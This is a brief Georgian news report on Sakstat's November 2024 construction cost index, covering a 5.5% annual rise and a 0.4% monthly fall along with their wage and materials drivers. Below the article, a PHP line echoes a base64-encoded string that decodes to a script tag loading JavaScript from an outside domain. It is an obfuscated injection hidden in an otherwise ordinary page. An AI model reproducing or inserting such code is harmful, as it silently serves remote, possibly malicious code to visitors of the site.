celsiusi
ავერსი jaluzi

2024 წლის ნოემბერში წინა წლის შესაბამის თვესთან შედარებით მშენებლობის ღირებულების ინდექსი 5.5%-ით გაიზარდა - ინფორმაციას საქსტატი აქვეყნებს.

რაც შეეხება, თვიურ ჭრილს, 2024 წლის ნოემბერში მშენებლობის ღირებულების ინდექსი წინა თვესთან შედარებით 0.4 პროცენტით შემცირდა.

უწყების ცნობით, აღნიშნული ცვლილება, ძირითადად, განპირობებული იყო მშენებლობის დარგში დაქირავებით დასაქმებულთა საშუალო თვიური ნომინალური ხელფასის 2.7 პროცენტიანი კლებით, რამაც -0.53 პროცენტული პუნქტი შეიტანა ჯამური ინდექსის ცვლილებაში.

„ინდექსის ზრდა, უმეტესწილად, გამოწვეული იყო მშენებლობის დარგში დაქირავებით დასაქმებულთა საშუალო თვიური ნომინალური ხელფასის 24.8 პროცენტიანი ზრდით და სამშენებლო მასალების 3.0 პროცენტიანი გაძვირებით, რამაც შესაბამისად, 3.82 და 1.81 პროცენტული პუნქტი შეიტანა ჯამური ინდექსის ცვლილებაში. ამასთან, 2022 წლის თებერვალთან შედარებით მშენებლობის ღირებულების ინდექსი გაიზარდა 19.6 პროცენტით,“ - ნათქვამია „საქსტატის“ ინფორმაციაში.

75
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");